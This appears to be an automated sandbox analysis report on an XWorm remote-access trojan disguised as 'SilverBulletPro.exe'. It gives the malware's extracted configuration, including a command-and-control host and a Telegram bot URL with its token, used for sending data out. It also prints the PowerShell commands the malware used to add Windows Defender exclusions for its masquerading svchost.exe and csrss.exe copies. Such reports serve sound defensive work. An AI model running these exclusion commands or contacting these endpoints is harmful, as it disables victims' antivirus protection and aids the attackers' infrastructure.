Analysis
max time kernel: 131s
max time network: 149s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 22-05-2024 21:42
Static task: static1
Behavioral task: behavioral1
Sample: SilverBulletPro.exe
Resource: win10-20240404-en
Behavioral task: behavioral2
Sample: SilverBulletPro.exe
Resource: win10v2004-20240508-en
General
Target: SilverBulletPro.exe
Size: 3.3MB
MD5: 3a05915ef59826910a7935060c9cb8f2
SHA1: b89b7bbf347b380d98c56d7261f3780dbdd94290
SHA256: ad121ddbed20a93a429f98df9aa1a589f5efd7fe2a579e00a5ea4409ef9d814d
SHA512: 8c80f88a9738c9fec207f06c86537d2ff32580dd1d6a51deaee1bde318e211669c0eb82a45c350fcd6d54f3ed7c5f628bc472cddc71f0fb29e43931df1c2da1b
SSDEEP: 49152:lffAbklzCfGDY2G+qnb7IzJunAyDZTk1VQq3/YtjCq3x5ZtztwZFG/i/kvfp:lD8vQQnAZbetlh5Zt5wZF0i/kH
Malware Config
Extracted
xworm
dsasinject-58214.portmap.io:3389
Install_directory: %AppData%
install_file: svchost.exe
telegram: https://api.telegram.org/bot7023899363:AAFEzgbfWzhyE32Lf95TKSRYEYXMd4AfMyk/sendMessage?chat_id=6354844663
Signatures
Detect Xworm Payload 2 IoCs
Processes:
resource | yara_rule
behavioral1/memory/200-19-0x0000000000500000-0x000000000051A000-memory.dmp | family_xworm
C:\Users\Admin\AppData\Roaming\svchost.exe | family_xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
pid | process
4136 | powershell.exe
4472 | powershell.exe
4576 | powershell.exe
4864 | powershell.exe
3720 | powershell.exe
3592 | powershell.exe
4568 | powershell.exe
304 | powershell.exe
4940 | powershell.exe
312 | powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\International\Geo\Nation | SilverBulletPro.exe
Drops startup file 4 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | svchost.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | svchost.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\csrss.lnk | csrss.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\csrss.lnk | csrss.exe
Executes dropped EXE 5 IoCs
Processes:
pid | process
3584 | SilverBulletPro.exe
200 | svchost.exe
5100 | csrss.exe
4640 | SilverBulletPro44B.tmp
1380 | SilverBulletPro-v1.5.8.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | process | target process
PID 3584 set thread context of 4640 | 3584 | SilverBulletPro.exe | SilverBulletPro44B.tmp
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance | SilverBulletPro.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid | process
5100 | csrss.exe
Suspicious behavior: EnumeratesProcesses 37 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
pid | process
200 | svchost.exe
Suspicious use of WriteProcessMemory 45 IoCs
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe 1⤵
Command line: "C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe"
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe 2⤵
Command line: "C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe"
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3⤵
Command line: powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe" -Force
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3⤵
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".tmp" -Force
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\Users\Admin\AppData\Local\Temp\SilverBulletPro44B.tmp 3⤵
Command line: "C:\Users\Admin\AppData\Local\Temp\silverbulletapi.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe 3⤵
Command line: "C:\Users\Admin\AppData\Local\Temp\SilverBulletPro-v1.5.8.exe"
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\svchost.exe 2⤵
Command line: "C:\Users\Admin\AppData\Roaming\svchost.exe"
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3⤵
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3⤵
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3⤵
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3⤵
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\csrss.exe 2⤵
Command line: "C:\ProgramData\csrss.exe"
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3⤵
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\csrss.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3⤵
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'csrss.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3⤵
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\csrss.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 3⤵
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'csrss.exe'
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\vssvc.exe 1⤵
Command line: C:\Windows\system32\vssvc.exe
Network
MITRE ATT&CK Matrix ATT&CK v13